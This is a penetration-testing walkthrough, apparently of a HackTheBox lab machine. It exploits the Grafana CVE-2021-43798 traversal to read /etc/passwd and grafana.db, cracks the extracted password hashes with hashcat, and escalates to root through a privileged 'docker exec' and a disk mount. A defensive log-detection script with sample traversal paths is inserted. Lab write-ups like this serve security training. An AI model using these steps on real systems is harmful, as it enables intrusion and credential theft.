As we get deep into this engagement, I'll demonstrate my penetration testing methodology and my thought process while scanning and exploiting the target, trying various techniques and going through some trial and error along the way.
First of all, we use the ping tool to send ICMP Echo Requests to see if the host is up and running:
As we can see from the screenshot above, the target is up and running. Let's go to the next step, which is scanning the target for open ports and possible vulnerabilities!
I would normally use nmap here, but this time let's spice things up and use another tool just for the fun of it: Zenmap will be the pathway this time.
From the initial scan, we can find two open ports: port 22, which is SSH, and port 3000, which is HTTP running Grafana. Let's head to the web server on port 3000 to see if we can find something interesting.
By going to the Grafana dashboard on the web server running on port 3000, I found that a vulnerable version is present: v8.0.0 (41f0542c1e).
This version is vulnerable to directory traversal and arbitrary file read: CVE-2021-43798.
Details about the vulnerability:
Grafana is an open-source platform for monitoring and observability. Grafana versions 8.0.0-beta1 through 8.3.0 (except for patched versions) are vulnerable to directory traversal, allowing access to local files. The vulnerable URL path is `<grafana_host_url>/public/plugins/<plugin_id>/`, where `<plugin_id>` is the plugin ID of any installed plugin. At no time has Grafana Cloud been vulnerable. Users are advised to upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1. The GitHub Security Advisory contains more information about vulnerable URL paths, mitigation, and the disclosure timeline.
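From the defender's side, the traversal described above leaves a recognisable trace in Grafana's request log. The following Python detector is an added example, not part of the original write-up: it parses constructed logfmt-style request lines (the field names `method`, `path`, `status` and `remote_addr` are assumed), URL-decodes each path repeatedly so nested encodings cannot hide a `..`, and flags any `/public/plugins/<plugin_id>/` request that walks upwards.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in a Grafana-style logfmt request log
# (router logging). Field names are assumed for illustration.
SAMPLE_LOG = """\
lvl=info msg="Request Completed" method=GET path=/public/plugins/welcome/img/logo.png status=200 remote_addr=10.0.0.5
lvl=info msg="Request Completed" method=GET path=/public/plugins/welcome/../../../../etc/passwd status=200 remote_addr=10.0.0.9
lvl=info msg="Request Completed" method=GET path=/public/plugins/alertlist/..%2f..%2f..%2f..%2fetc/grafana/grafana.ini status=200 remote_addr=10.0.0.9
lvl=info msg="Request Completed" method=GET path=/public/plugins/grafana/%2e%2e/%2e%2e/var/lib/grafana/grafana.db status=404 remote_addr=10.0.0.7
lvl=info msg="Request Completed" method=GET path=/api/health status=200 remote_addr=10.0.0.5
"""

# key=value pairs; values are either a double-quoted string or a bare token
FIELD_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')

def parse_logfmt(line):
    """Return a dict of key=value fields from one logfmt line."""
    fields = {}
    for key, value in FIELD_RE.findall(line):
        if value.startswith('"') and value.endswith('"'):
            value = value[1:-1]
        fields[key] = value
    return fields

def normalise_path(path):
    """URL-decode repeatedly (bounded) so %2e%2e or %252e%252e cannot hide '..'."""
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def is_plugin_traversal(path):
    """True if the decoded path is a /public/plugins/<id>/ request containing a '..' segment."""
    norm = normalise_path(path)
    if not norm.startswith('/public/plugins/'):
        return False
    return any(seg == '..' for seg in norm.split('/'))

def find_traversal_attempts(log_text):
    """Return (remote_addr, status, decoded_path) for every flagged GET request."""
    hits = []
    for line in log_text.splitlines():
        f = parse_logfmt(line)
        if f.get('method') == 'GET' and is_plugin_traversal(f.get('path', '')):
            hits.append((f.get('remote_addr'), f.get('status'), normalise_path(f['path'])))
    return hits
```

A 200 status on a flagged request is the signal that the read actually succeeded; 404s still show the probing and are worth correlating by source address.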
Next, by running the PoC script as-is, I can test the arbitrary file read:
By reading /etc/passwd, I could confirm that the path traversal vulnerability is present.
Next, I'd like to read something that gives me more value. Let's dig deeper.
Following a hint from HTB's Guided Mode about the Grafana DB: the Grafana DB file on Data is in the default location. Reading /etc/grafana/grafana.ini will show the path as well, though split across a couple of settings.
Let's try to read this file.
Some information worth noting (the leading `;` means the line is commented out, so this is the default value):
# used for signing
;secret_key = SW2YcwTIb9zpOOhoPsMm
I also found a user called boris; maybe that will be our initial foothold.
Let's view the database we downloaded and see if we can find any juicy information, like a password.
By examining the grafana.db file with sqlite3, I could use the following commands in sequence to find the hashes of two users, admin and boris:
sqlite> .tables
sqlite> .headers on
sqlite> select * from user;
sqlite> select login,password,salt from user;
Bingo, I found the following hashes:
admin|7a919e4bbe95cf5104edf354ee2e6234efac1ca1f81426844a24c4df6131322cf3723c92164b6172e9e73faf7a4c2072f8f8|YObSoLj55S
boris|dc6becccbb57d34daf4a4e391d2015d3350c60df3608e9e99b5291e47f3e5cd39d156be220745be3cbe49353e35f53b51da8|LCBhdtJWjl
Next, I'm going to use a repo that converts these Grafana SQLite hash and salt pairs into a format hashcat can use:
7a919e4bbe95cf5104edf354ee2e6234efac1ca1f81426844a24c4df6131322cf3723c92164b6172e9e73faf7a4c2072f8f8,YObSoLj55S
dc6becccbb57d34daf4a4e391d2015d3350c60df3608e9e99b5291e47f3e5cd39d156be220745be3cbe49353e35f53b51da8,LCBhdtJWjl
Using the repo at https://github.com/iamaldi/grafana2hashcat, I can run the following command to generate the hashcat-formatted hashes:
python /opt/grafana2hashcat/grafana2hashcat.py grafana_hashsalt -o grafanahashes
┌──(root💀CSEC)-[/opt/grafana2hashcat]
└─# cat grafanahashes
sha256:10000:WU9iU29MajU1Uw==:epGeS76Vz1EE7fNU7i5iNO+sHKH4FCaESiTE32ExMizzcjySFkthcunnP696TCBy+Pg=
sha256:10000:TENCaGR0SldqbA==:3GvszLtX002vSk45HSAV0zUMYN82COnpm1KR5H8+XNOdFWviIHRb48vkk1PjX1O1Hag=
Now to the fun part, cracking, with my favourite tool: hashcat.
hashcat grafanahashes /usr/share/wordlists/rockyou.txt
And in less than a minute, I've found a password, probably Boris's.
Let's log in over SSH with the found credentials.
FOUND CREDENTIALS: sha256:10000:TENCaGR0SldqbA==:3GvszLtX002vSk45HSAV0zUMYN82COnpm1KR5H8+XNOdFWviIHRb48vkk1PjX1O1Hag=:beautiful1
And here we go, successfully logged in:
I ran sudo -l and found that the following command can be run as root without a password, which hints at a good method to escalate privileges to root:
boris@data:/$ sudo -l
Matching Defaults entries for boris on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User boris may run the following commands on localhost:
    (root) NOPASSWD: /snap/bin/docker exec *
boris@data:/$ ^C
Going forward, I found the container's ID by running the ps command to list the running processes:
e6ff5b1cbc85cdb2157879161e42a08c1062da655f5a6b7e24488342339d4b81 = Docker Container ID.
Next, I'll run the following command to get a root shell inside the container:
sudo docker exec -it --privileged --user root e6ff5b1cbc85cdb2157879161e42a08c1062da655f5a6b7e24488342339d4b81 bash
Then I'll mount the /dev/sda1 device I found earlier:
mount /dev/sda1 /mnt/
And here we go, root achieved: